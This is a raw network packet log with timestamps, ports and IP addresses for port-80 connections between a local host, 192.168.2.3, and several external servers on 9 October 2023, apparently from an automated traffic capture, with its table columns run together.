                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.454147100 CEST8049820213.186.33.17192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.454152107 CEST4982080192.168.2.3213.186.33.17
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.454180002 CEST4982080192.168.2.3213.186.33.17
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.454186916 CEST4982080192.168.2.3213.186.33.17
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708332062 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708358049 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708368063 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708379984 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708390951 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708398104 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708404064 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708415031 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708424091 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708434105 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708441019 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708477974 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708488941 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708544016 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708555937 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708659887 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708672047 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708683014 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708695889 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708707094 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708734989 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708746910 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708791018 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708796978 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708797932 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708797932 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708797932 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708797932 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708797932 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708797932 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708798885 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708832979 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708846092 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708857059 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708868027 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708879948 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708884001 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708884001 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708909035 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708942890 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708945990 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708955050 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708997011 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.708997011 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.709050894 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.709063053 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.709096909 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.709126949 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.042407036 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.042527914 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.042608023 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.042623043 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.042669058 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.042701960 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.042706013 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.042748928 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.042778015 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.042819977 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.042844057 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.042902946 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.043184996 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.043216944 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.043241978 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.043255091 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.043278933 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.043309927 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.043313980 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.043359995 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.043365955 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.043404102 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.043414116 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.043442011 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.043495893 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.043545008 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.043556929 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.043596983 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.043602943 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.043633938 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.044435024 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.044491053 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.049833059 CEST804981681.2.194.241192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.049911022 CEST4981680192.168.2.381.2.194.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.200181961 CEST4981480192.168.2.3193.166.255.171
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.319911003 CEST4982280192.168.2.3142.250.217.147
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.320492029 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.322734118 CEST4982480192.168.2.3104.26.11.81
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.378442049 CEST4982180192.168.2.351.79.51.72
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.468126059 CEST4982580192.168.2.3104.26.3.124
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.483683109 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.483895063 CEST804979359.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.484071016 CEST4979380192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.485357046 CEST8049824104.26.11.81192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.485426903 CEST4982480192.168.2.3104.26.11.81
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.485688925 CEST4982480192.168.2.3104.26.11.81
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.492000103 CEST8049822142.250.217.147192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.502388954 CEST8049822142.250.217.147192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.502445936 CEST4982280192.168.2.3142.250.217.147
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.519251108 CEST4982280192.168.2.3142.250.217.147
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.574266911 CEST4982680192.168.2.3192.241.158.94
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.613307953 CEST804982151.79.51.72192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.613502026 CEST804982151.79.51.72192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.613579035 CEST4982180192.168.2.351.79.51.72
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.613712072 CEST4982180192.168.2.351.79.51.72
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.630791903 CEST8049825104.26.3.124192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.630887985 CEST4982580192.168.2.3104.26.3.124
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.631505966 CEST4982580192.168.2.3104.26.3.124
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.648612976 CEST8049824104.26.11.81192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.652329922 CEST4982780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.662734985 CEST4982880192.168.2.396.127.180.42
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.694186926 CEST8049822142.250.217.147192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.698034048 CEST8049822142.250.217.147192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.698229074 CEST4982280192.168.2.3142.250.217.147
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.743169069 CEST4982980192.168.2.3104.21.42.10
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.794123888 CEST8049825104.26.3.124192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.817265987 CEST8049826192.241.158.94192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.817414045 CEST4982680192.168.2.3192.241.158.94
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.824141026 CEST4982680192.168.2.3192.241.158.94
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.829747915 CEST8049825104.26.3.124192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.829775095 CEST8049825104.26.3.124192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.829812050 CEST4982580192.168.2.3104.26.3.124
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.829839945 CEST4982580192.168.2.3104.26.3.124
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.846734047 CEST4982580192.168.2.3104.26.3.124
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.848303080 CEST804982151.79.51.72192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.868856907 CEST804978880.93.82.33192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.869015932 CEST4978880192.168.2.380.93.82.33
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.882110119 CEST804982896.127.180.42192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.882225037 CEST4982880192.168.2.396.127.180.42
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.882567883 CEST4982880192.168.2.396.127.180.42
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.882595062 CEST80498273.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.882653952 CEST4982780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.882850885 CEST4982780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.906227112 CEST8049829104.21.42.10192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.906447887 CEST4982980192.168.2.3104.21.42.10
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.906696081 CEST4982980192.168.2.3104.21.42.10
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.927450895 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.927495003 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.927508116 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.927520990 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.927532911 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.927545071 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.927608013 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.927644968 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.927706003 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.927747011 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.927747011 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.927747011 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.927747011 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.927773952 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.927851915 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.928132057 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.928183079 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.928184986 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.928199053 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.928227901 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.928257942 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.995738029 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.995769978 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.995778084 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.995789051 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.996011972 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.996052980 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.996103048 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.996120930 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.996161938 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.996231079 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.996268988 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.996287107 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.996382952 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.997051954 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.997112036 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.997180939 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.997188091 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.997204065 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.997227907 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.997231960 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.997278929 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.997916937 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.997982979 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.998007059 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.998032093 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.998054028 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.998086929 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.998131037 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.998950958 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.999006033 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.999062061 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.999082088 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.999181986 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.999196053 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.999223948 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.999241114 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.999806881 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.999835968 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.999876022 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.999916077 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.999932051 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.036427975 CEST8049825104.26.3.124192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.036458015 CEST8049825104.26.3.124192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.036578894 CEST4982580192.168.2.3104.26.3.124
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.063153982 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.063179016 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.063193083 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.063241959 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.063347101 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.063347101 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.063488007 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.063502073 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.063543081 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.063570023 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.063571930 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.063618898 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.063623905 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.063672066 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.064354897 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.064383030 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.064410925 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.064438105 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.064455986 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.064502001 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.064538956 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.064584017 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.065304995 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.065346003 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.065361023 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.065397978 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.065402031 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.065443039 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.065455914 CEST8049826192.241.158.94192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.065471888 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.065490007 CEST8049826192.241.158.94192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.065498114 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.065526962 CEST4982680192.168.2.3192.241.158.94
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.066191912 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.066237926 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.066273928 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.066299915 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.066332102 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.066376925 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.066407919 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.066459894 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.067157984 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.067212105 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.067238092 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.067281008 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.067287922 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.067296028 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.067327976 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.067353964 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.068069935 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.068123102 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.068190098 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.068238020 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.068255901 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.068301916 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.068325043 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.068388939 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.068979025 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.068994045 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.069029093 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.069051981 CEST4982380192.168.2.3172.67.201.26
